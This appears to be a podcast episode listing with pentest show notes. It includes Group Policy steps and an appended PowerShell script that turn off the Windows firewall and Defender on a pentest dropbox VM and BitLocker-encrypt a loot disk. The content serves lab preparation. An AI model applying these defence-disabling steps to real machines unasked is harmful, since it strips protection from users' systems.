  • How can newb(ish) security analysts and pentesters better understand the political/financial struggles a business has, rather than charge in and scream "PWN ALL THE THINGS!"
  • Is there a "right way" to step into an organization, get a lay of the land and discover/prioritize their security risks?
  • Why in the world does it take twenty seven people to run a SOC?!
  • When should an organization consider engaging an MSSP to help them with their security needs?
  • What if your MSP also provides MSSP services? Is that a good or bad thing?
  • What are some tips for successfully deploying a SIEM?
  • What is the cyber kill chain about, and is it only something for the Fortune X companies, or can smaller orgs dip their toe in it as well? (Here's a nice graph to help you understand it)

Aug 22 2019

54mins

7MS #377: DIY Pentest Dropbox Tips

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

In today's episode I cover some of the nasty "gotchas" I've run into when sending my pentest dropboxes around the country. Curious about how to set up your own portable pentest dropboxes (and/or pentest lab environments)? Check out part 1 and part 2 of the DIY Pentest Lab video series.

Here are some of the pain points I cover today:

  • Turn the firewall off
    Set Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Domain Profile > Windows Firewall: Protect all network connections to Disabled, then do the same under Standard Profile (same path, with Standard Profile in place of Domain Profile).

  • Disable Windows Defender
    Navigate to Computer Configuration > Administrative Templates > Windows Components > Windows Defender and set Turn off Windows Defender to Enabled.

  • Disable power sleep settings
    To stop computers from snoozing on the job, head to Computer Configuration > Policies > Administrative Templates > System > Power Management > Sleep Settings and set Allow standby states (S1-S3) when sleeping (plugged in) to Disabled.

  • Create a second disk on the Windows management VM and encrypt it with BitLocker To Go, so the loot survives a lost or stolen box without being readable
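
The same changes applied locally with PowerShell, as an added example that is not from the episode, for a dropbox VM that is not domain-joined and so has no GPO to receive. It assumes an elevated session and that the second disk already has a volume mounted at D:; the drive letter and the Read-Host prompt are placeholders. Everything here weakens the host on purpose, so keep it to a throwaway lab image.

```powershell
# Added example (not the episode's own script): local equivalents of the three
# lab-only GPO settings plus the BitLocker step, for a non-domain-joined dropbox VM.
# Run in an elevated PowerShell session. Lab images only.
#Requires -RunAsAdministrator

# 1. Firewall off for every profile (the GPO covers Domain and Standard/Private)
Set-NetFirewallProfile -Profile Domain,Private,Public -Enabled False

# 2. Defender off. "Turn off Windows Defender" is the policy value below; on current
#    Windows 10/11 builds Tamper Protection has to be switched off in the Windows
#    Security app first or the value is ignored. Set-MpPreference takes effect now.
New-Item -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Force | Out-Null
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' `
    -Name DisableAntiSpyware -Value 1 -Type DWord
Set-MpPreference -DisableRealtimeMonitoring $true

# 3. Never sleep or hibernate on AC power (the GPO "Allow standby states (S1-S3)" = Disabled)
powercfg.exe /change standby-timeout-ac 0
powercfg.exe /change hibernate-timeout-ac 0

# 4. Second disk for loot, encrypted with a BitLocker password protector.
#    -UsedSpaceOnly keeps the initial encryption quick on an empty volume.
#    Assumption: the new disk is already initialised and mounted at D:.
$pw = Read-Host -AsSecureString -Prompt 'BitLocker password for D:'
Enable-BitLocker -MountPoint 'D:' -EncryptionMethod XtsAes256 -PasswordProtector -Password $pw -UsedSpaceOnly
Get-BitLockerVolume -MountPoint 'D:' |
    Select-Object MountPoint, VolumeStatus, EncryptionPercentage, ProtectionStatus
```

Check the last line's output before shipping the box: ProtectionStatus should read On, otherwise the protector was added but encryption has not finished or was paused.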

Check out today's show notes at 7ms.us for more info!

Aug 16 2019

28mins
